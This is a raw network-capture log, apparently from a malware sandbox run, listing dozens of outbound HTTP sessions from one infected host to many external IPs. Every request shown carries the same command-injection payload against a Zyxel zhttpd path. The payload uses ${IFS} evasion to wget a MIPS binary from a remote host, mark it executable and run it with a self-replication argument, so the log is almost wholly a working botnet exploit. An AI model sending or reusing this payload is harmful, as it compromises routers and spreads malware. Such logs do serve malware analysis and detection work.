                                    Jan 13, 2024 19:01:58.694108963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    385192.168.2.134520845.248.177.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694147110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    386192.168.2.134929639.215.114.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694156885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    387192.168.2.133805841.96.209.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694195986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    388192.168.2.135808258.251.104.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694237947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    389192.168.2.1343940168.140.125.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694262981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    390192.168.2.13380704.211.230.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694295883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    391192.168.2.134769243.60.58.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694328070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    392192.168.2.135913459.6.14.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694359064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    393192.168.2.134832851.86.93.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694405079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    394192.168.2.1356018133.102.128.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694428921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    395192.168.2.1339982106.8.23.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694449902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    396192.168.2.1339026177.253.97.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694498062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    397192.168.2.1343850210.65.13.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694549084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    398192.168.2.1334876202.202.51.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694566011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    399192.168.2.1344728218.38.218.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694586039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    400192.168.2.135329654.130.57.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694611073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    401192.168.2.1358936140.146.92.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694658041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    402192.168.2.134095053.59.11.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694700003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    403192.168.2.1336134180.132.95.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694710016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    404192.168.2.1357412186.42.137.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694772005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    405192.168.2.1340664190.220.114.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694812059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    406192.168.2.1340094157.179.117.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694855928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    407192.168.2.135395223.217.15.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694855928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    408192.168.2.1358560140.99.45.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694907904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    409192.168.2.1358288143.73.149.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694931984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    410192.168.2.1341412185.246.141.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694945097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    411192.168.2.134470846.7.20.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.694967985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    412192.168.2.1333428186.68.121.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695014954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    413192.168.2.1350492175.14.78.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695051908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    414192.168.2.1353914189.79.82.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695095062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    415192.168.2.1358690142.207.5.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695096016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    416192.168.2.1351644109.125.190.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695154905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    417192.168.2.1335110129.69.207.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695188046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    418192.168.2.1345280170.4.63.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695384026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    419192.168.2.134883864.220.252.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695442915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    420192.168.2.1335918153.137.12.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695683956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    421192.168.2.1356482128.212.151.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695708990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    422192.168.2.1358316194.64.202.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:58.695805073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    423192.168.2.133476688.132.84.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700241089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    424192.168.2.135675649.190.24.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700275898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    425192.168.2.1340606108.123.211.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700299025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    426192.168.2.1350550132.75.144.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700340033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    427192.168.2.134283879.55.24.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700352907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    428192.168.2.1333212216.241.161.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700406075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    429192.168.2.1342002135.62.168.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700432062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    430192.168.2.1342778171.194.118.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700476885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    431192.168.2.134414836.70.177.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700524092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    432192.168.2.1345358170.63.202.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700547934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    433192.168.2.1344710102.16.95.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700576067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    434192.168.2.1339796154.37.66.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700609922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    435192.168.2.1341874144.182.38.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700651884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    436192.168.2.1343490175.169.235.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700660944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    437192.168.2.135139231.135.184.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700701952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    438192.168.2.135097682.38.87.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700721025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    439192.168.2.134573247.17.219.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700753927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    440192.168.2.1345106182.208.35.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700792074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    441192.168.2.133595898.229.245.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700797081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    442192.168.2.13352305.157.1.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700845003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    443192.168.2.1358256107.77.206.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700891972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    444192.168.2.1337114195.162.152.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700897932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    445192.168.2.1352322208.98.32.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700933933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    446192.168.2.1344484164.46.188.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:59.700999022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    447192.168.2.1345632112.200.213.225443
                                    TimestampBytes transferredDirectionData
